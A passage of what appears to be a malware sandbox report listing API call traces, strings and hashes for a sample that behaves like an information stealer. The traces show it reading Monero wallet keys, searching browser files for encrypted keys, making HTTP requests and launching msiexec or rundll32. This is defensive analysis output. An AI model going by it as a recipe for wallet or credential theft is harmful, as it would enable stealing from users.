                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 047ECCD3
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 047ECCF0
                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 047ECCFC
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 047ECD0F
                                              • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 047ECD1C
                                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 047ECD40
                                              • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 047ECD5E
                                              • StrStrA.SHLWAPI(00000000,0064A364), ref: 047ECD85
                                              • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 047ECF09
                                              • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 047ECF20
                                                • Part of subcall function 047ECA87: memset.MSVCRT ref: 047ECABA
                                                • Part of subcall function 047ECA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 047ECAD8
                                                • Part of subcall function 047ECA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 047ECAE3
                                                • Part of subcall function 047ECA87: memcpy.MSVCRT(?,?,?), ref: 047ECB79
                                              • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 047ECFC1
                                              • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 047ECFD8
                                                • Part of subcall function 047ECA87: lstrcat.KERNEL32(?,00420B46), ref: 047ECBAA
                                                • Part of subcall function 047ECA87: lstrcat.KERNEL32(?,00420B47), ref: 047ECBBE
                                                • Part of subcall function 047ECA87: lstrcat.KERNEL32(?,00420B4E), ref: 047ECBDF
                                              • lstrlen.KERNEL32(00000000), ref: 047ED0AB
                                              • CloseHandle.KERNEL32(00000000), ref: 047ED103
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                              • String ID:
                                              • API String ID: 3555725114-3916222277
                                              • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                              • Instruction ID: 14584f13f46bbc46d0d177d78c0503fadc48a77bf0d93ecaf60bd58eeb81c9ad
                                              • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                              • Instruction Fuzzy Hash: BFE1F175910208AFDB15EBA4DD98EEEB779AF54304F004169F20AA7391EF347A89CF50
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • RegOpenKeyExA.ADVAPI32(00000000,02BE7088,00000000,00020019,00000000,004205B6), ref: 004183A4
                                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                              • wsprintfA.USER32 ref: 00418459
                                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                              • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                                              • String ID: - $%s\%s$?
                                              • API String ID: 3246050789-3278919252
                                              • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                              • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                              • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                              • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • memset.MSVCRT ref: 00410C1C
                                              • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                              • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                              • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                              • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                              • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                              • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                              • lstrlenA.KERNEL32(?), ref: 00410CA7
                                              • memset.MSVCRT ref: 00410CCD
                                              • memset.MSVCRT ref: 00410CE1
                                                • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02BE5AC0,?,0042110C,?,00000000), ref: 0041A82B
                                                • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02BB4BE0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                              • String ID: .exe
                                              • API String ID: 1395395982-4119554291
                                              • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                              • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                              • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                              • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                              APIs
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateGlobalStream
                                              • String ID: image/jpeg
                                              • API String ID: 2244384528-3785015651
                                              • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                              • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                              • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                              • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                              APIs
                                              • strtok_s.MSVCRT ref: 00411307
                                              • strtok_s.MSVCRT ref: 00411750
                                                • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02BE5AC0,?,0042110C,?,00000000), ref: 0041A82B
                                                • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: strtok_s$lstrcpylstrlen
                                              • String ID:
                                              • API String ID: 348468850-0
                                              • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                              • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                              • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                              • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExecuteShell$lstrcpy
                                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                              • API String ID: 2507796910-3625054190
                                              • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                              • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                              • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                              • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                              APIs
                                              • memset.MSVCRT ref: 0041429E
                                              • memset.MSVCRT ref: 004142B5
                                                • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                              • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                              • lstrcatA.KERNEL32(?,02BE97A8), ref: 0041430B
                                              • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                              • lstrcatA.KERNEL32(?,02BE9250), ref: 00414333
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                              • StrStrA.SHLWAPI(?,02BE9778), ref: 004143F3
                                              • GlobalFree.KERNEL32(?), ref: 00414512
                                                • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                              • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                              • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                              • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                              • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                              • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                              • String ID:
                                              • API String ID: 1191620704-0
                                              • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                              • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                              • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                              • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                              APIs
                                              • memset.MSVCRT ref: 047F4505
                                              • memset.MSVCRT ref: 047F451C
                                                • Part of subcall function 047F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 047F9072
                                              • lstrcat.KERNEL32(?,00000000), ref: 047F4553
                                              • lstrcat.KERNEL32(?,0064A30C), ref: 047F4572
                                              • lstrcat.KERNEL32(?,?), ref: 047F4586
                                              • lstrcat.KERNEL32(?,0064A5D8), ref: 047F459A
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                                • Part of subcall function 047F8FF7: GetFileAttributesA.KERNEL32(00000000,?,047E1DBB,?,?,0042564C,?,?,00420E1F), ref: 047F9006
                                                • Part of subcall function 047E9F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 047E9FA0
                                                • Part of subcall function 047E9F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 047E9FF9
                                                • Part of subcall function 047E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 047E9C53
                                                • Part of subcall function 047E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 047E9C78
                                                • Part of subcall function 047E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 047E9C98
                                                • Part of subcall function 047E9C27: ReadFile.KERNEL32(000000FF,?,00000000,047E16F6,00000000), ref: 047E9CC1
                                                • Part of subcall function 047E9C27: LocalFree.KERNEL32(047E16F6), ref: 047E9CF7
                                                • Part of subcall function 047E9C27: CloseHandle.KERNEL32(000000FF), ref: 047E9D01
                                                • Part of subcall function 047F9627: GlobalAlloc.KERNEL32(00000000,047F4644,047F4644), ref: 047F963A
                                              • StrStrA.SHLWAPI(?,0064A0D8), ref: 047F465A
                                              • GlobalFree.KERNEL32(?), ref: 047F4779
                                                • Part of subcall function 047E9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,047E5155,00000000,00000000), ref: 047E9D56
                                                • Part of subcall function 047E9D27: LocalAlloc.KERNEL32(00000040,?,?,?,047E5155,00000000,?), ref: 047E9D68
                                                • Part of subcall function 047E9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,047E5155,00000000,00000000), ref: 047E9D91
                                                • Part of subcall function 047E9D27: LocalFree.KERNEL32(?,?,?,?,047E5155,00000000,?), ref: 047E9DA6
                                                • Part of subcall function 047EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 047EA094
                                              • lstrcat.KERNEL32(?,00000000), ref: 047F470A
                                              • StrCmpCA.SHLWAPI(?,004208D1), ref: 047F4727
                                              • lstrcat.KERNEL32(00000000,00000000), ref: 047F4739
                                              • lstrcat.KERNEL32(00000000,?), ref: 047F474C
                                              • lstrcat.KERNEL32(00000000,00420FB8), ref: 047F475B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                              • String ID:
                                              • API String ID: 1191620704-0
                                              • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                              • Instruction ID: 3aa59061ba5b3361f1d78a57ec4180b043ad14255e0b02beba164629e6362102
                                              • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                              • Instruction Fuzzy Hash: 157143B6910218BBDB14FBE0DC89FEE7379AF49304F008598E60596280EB75E759CF61
                                              APIs
                                              • memset.MSVCRT ref: 00401327
                                                • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                              • lstrlenA.KERNEL32(?), ref: 0040135C
                                              • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02BB4BE0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                              • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                              • memset.MSVCRT ref: 00401516
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                              • API String ID: 1930502592-218353709
                                              • Opcode ID: 390306303151acf945eda6930258b594824c7e73dd825ced81e9acabb75cf343
                                              • Instruction ID: 08c9335de7abd286bd6d54ba2defbb004ea5f0675b744838ecfde5eb377178ec
                                              • Opcode Fuzzy Hash: 390306303151acf945eda6930258b594824c7e73dd825ced81e9acabb75cf343
                                              • Instruction Fuzzy Hash: 685175B1D5011897CB15FB61DD91FED733CAF54304F4041ADB60A62091EE385BDACBAA
                                              APIs
                                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,02BEB110), ref: 00406303
                                                • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,02BEA3E0,00000000,00000000,00400100,00000000), ref: 00406385
                                                • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                              • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                              • lstrlenA.KERNEL32(00000000), ref: 00415383
                                              • strtok.MSVCRT(00000000,?), ref: 0041539E
                                              • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                              • API String ID: 3532888709-1526165396
                                              • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                              • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                              • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                              • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                              APIs
                                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
